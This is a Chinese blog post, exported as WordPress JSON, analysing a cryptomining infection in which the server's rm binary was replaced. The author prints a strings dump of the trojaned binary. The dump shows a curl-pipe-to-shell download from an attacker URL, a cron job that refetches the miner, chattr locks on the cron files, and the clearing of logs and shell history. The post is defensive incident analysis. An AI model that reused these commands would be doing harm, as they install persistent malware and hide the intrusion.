{"id":1057,"date":"2020-04-11T15:50:23","date_gmt":"2020-04-11T07:50:23","guid":{"rendered":"https:\/\/www.izhuhn.cn\/?p=1057"},"modified":"2020-04-11T15:50:23","modified_gmt":"2020-04-11T07:50:23","slug":"rm%e5%91%bd%e4%bb%a4%e8%a2%ab%e7%af%a1%e6%94%b9%e5%88%86%e6%9e%90","status":"publish","type":"post","link":"https:\/\/www.izhuhn.cn\/index.php\/2020\/04\/11\/rm%e5%91%bd%e4%bb%a4%e8%a2%ab%e7%af%a1%e6%94%b9%e5%88%86%e6%9e%90\/","title":{"rendered":"rm\u547d\u4ee4\u88ab\u7be1\u6539\u5206\u6790"},"content":{"rendered":"\n

\u6709\u53f0\u670d\u52a1\u4e2d\u4e86\u6316\u77ff\u540e\uff0c\u6740\u8fdb\u7a0b\u5220\u7a0b\u5e8f\uff0c\u53d1\u73b0\u5220\u9664\u4e0d\u4e86\uff0c\u540e\u9762\u6000\u7591rm\u547d\u4ee4\u6709\u95ee\u9898\u8fdb\u884c\u7b80\u5355\u5206\u6790\u786e\u8ba4\u4e86\u547d\u4ee4\u88ab\u66ff\u6362\u4e86\uff0c\u540e\u9762\u5c06\u6b63\u5e38rm\u8fdb\u884c\u66ff\u6362\u540e\u6b63\u5e38\uff0c\u5c06\u6316\u77ff\u7a0b\u5e8f\u6e05\u9664\u3002<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

\u5f02\u5e38rm\u7684md5\u503c\uff1a<\/p>\n\n\n\n

[root@testvm wakuang]# md5sum rm\nf3eda9bab1244305d976c4f07b23ce4c  rm<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u7528strings\u6253\u5370rm\u4e2d\u5185\u5bb9\u53d1\u73b0\u5f02\u5e38\uff1a<\/p>\n\n\n\n
ulimit -d unlimited\nulimit -m unlimited\nulimit -s unlimited\nulimit -t unlimited\nulimit -v unlimited\nulimit -u unlimited\nulimit -n 1048000\npopen %s error\necho 123 > \/etc\/velog\n\/etc\/velog\n\/proc\/self\/exe\nFailed\nError opening file\n\/usr\/bin\/wget\nwget -P \n -t 3 -T 20 \n\/usr\/bin\/get\nget -P \n\/usr\/bin\/curl\ncurl \n --connect-timeout 10  --max-time 30 --retry 3 > \n\/usr\/bin\/url\nurl \nps -fe|grep \n |grep -v grep|grep -v defunct\ncat \nerror in fork:%s\nerror in exec function:%s\nchattr -ia \nchmod 777 \nchattr +ia \nrm -f \nsetsid() failed (errno = %d)\nchdir() failed (errno = %d)\nhistory - c\necho > \/var\/spool\/mail\/root\necho > \/var\/log\/wtmp\necho > \/var\/log\/secure\necho > \/root\/.bash_history\ncurl -fsSL --connect-timeout 30 --max-time 30 --retry 3 \n | sh\nurl -fsSL --connect-timeout 30 --max-time 30 --retry 3 \npkill \nchmod 000 \necho 123aaa >> \ncat \/proc\/cpuinfo | grep name | cut -f2 -d: | uniq -c \ndmidecode|grep \"System Information\" -A9\ncat \/proc\/meminfo\nfree -m\ndf -h\nifconfig -a\ndmidecode -t bios\nstrings \/usr\/lib64\/libstdc++.so.6|grep GLIBCXX\ncat \/proc\/uptime\ncat \/proc\/version\nlspci | grep Ethernet\ntop -n 1|head -n 5\ncat \/etc\/issue\nchattr -ia \/var\/spool\/cron\nchattr -ia \/var\/spool\/cron\/root\n\/var\/spool\/cron\/root\necho >> \/var\/spool\/cron\/root\necho \"*\/6 * * * * curl -fsSL \n | sh > \/dev\/null 2>&1 \" >> '\/var\/spool\/cron\/root'\necho \"*\/6 * * * * url -fsSL \ncat '\/var\/spool\/cron\/root' |grep init.sh\ninit.sh\nchmod 644 \/var\/spool\/cron\/root\nchattr +ia \/var\/spool\/cron\/root\nchattr +ia \/var\/spool\/cron\nchattr +ia \/etc\/cron.d\n\/usr\/bin\/rmm\nQsjeVXG9\nhttp://w.lazer-n.com:43768\/init.sh\n<\/code><\/pre>\n\n\n\n
\u6267\u884c\u5b8crm\u4f1a\u4ece\u516c\u7f51\u5c06\u6316\u77ff\u7a0b\u5e8f\u4ee5\u53ca\u8ba1\u5212\u4efb\u52a1\u5168\u90e8\u91cd\u65b0\u4e0b\u8f7d\u4e00\u904d\uff0c\u5c06\u547d\u4ee4\u4ece\u5176\u4ed6\u673a\u5668\u62f7\u8d1d\u66ff\u6362\u6062\u590drm\u529f\u80fd\uff0c\u5c06\u6316\u77ff\u811a\u672c\u4fee\u6539\u5c06\u6240\u6709\u7a0b\u5e8f\u5220\u9664\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u6709\u53f0\u670d\u52a1\u4e2d\u4e86\u6316\u77ff\u540e\uff0c\u6740\u8fdb\u7a0b\u5220\u7a0b\u5e8f\uff0c\u53d1\u73b0\u5220\u9664\u4e0d\u4e86\uff0c\u540e\u9762\u6000\u7591rm\u547d\u4ee4\u6709\u95ee\u9898\u8fdb\u884c\u7b80\u5355\u5206\u6790\u786e\u8ba4\u4e86\u547d\u4ee4\u88ab\u66ff\u6362\u4e86\uff0c\u540e\u9762\u5c06\u6b63\u5e38rm\u8fdb\u884c\u66ff\u6362\u540e\u6b63\u5e38 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/posts\/1057"}],"collection":[{"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/comments?post=1057"}],"version-history":[{"count":1,"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/posts\/1057\/revisions"}],"predecessor-version":[{"id":1058,"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/posts\/1057\/revisions\/1058"}],"wp:attachment":[{"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/media?parent=1057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/categories?post=1057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.izhuhn.cn\/index.php\/wp-json\/wp\/v2\/tags?post=1057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}